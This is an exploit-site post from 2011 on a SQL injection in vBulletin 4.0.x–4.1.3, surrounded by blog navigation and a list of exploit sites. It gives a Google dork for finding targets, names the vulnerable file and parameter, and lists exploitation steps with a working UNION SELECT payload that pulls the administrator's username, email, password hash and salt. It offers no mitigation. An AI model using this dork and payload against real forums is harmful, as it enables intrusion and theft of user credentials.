SecurityXploit: Vbulletin 4.0.x => 4.1.3

Comments

Donate

Childfoundation
Newsletter
Contact
Wiki

Archiv

Homepage
Themes

Vbulletin 4.0.x => 4.1.3 - SQL

Am Thursday, 21. Jul 2011 im Topic 'Vulnerabilities'

Google Dork: intitle: powered by Vbulletin 4

Vulnerable Code:
File: /vbforum/search/type/socialgroupmessage.php
Line No: 388
Paramater : messagegroupid
Source
http://pastebin.com/0L6tCjM3

Exploitation:
Post data on: -->search.php?search_type=1
--> Search Single Content Type
Keywords : Valid Group Message
Search Type : Group Messages
Search in Group : Valid Group Id

&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

by FB1H2S

CONTACT

Email Xploit

Links

Visitor

Exploits

1337day
exploit-id
Packetstormsecurity
xssed
Exploit-db
Securityreason
Exploit Search
Security Home
Exploit Search
vulnerability-lab
YGN Group
E Hacking News
E Hacking News
Securityvulns
Expbase
Hackerscenter
osvdb
exploitsdownload

Status

Zum Kommentieren bitte einloggen.

July 2011
Mon	Tue	Wed	Thu	Fri	Sat	Sun
				1	2	3
4	5	6	7	8	9	10
11	12	13	14	15	16	17
18	19	20	21	22	23	24
25	26	27	28	29	30	31
June				August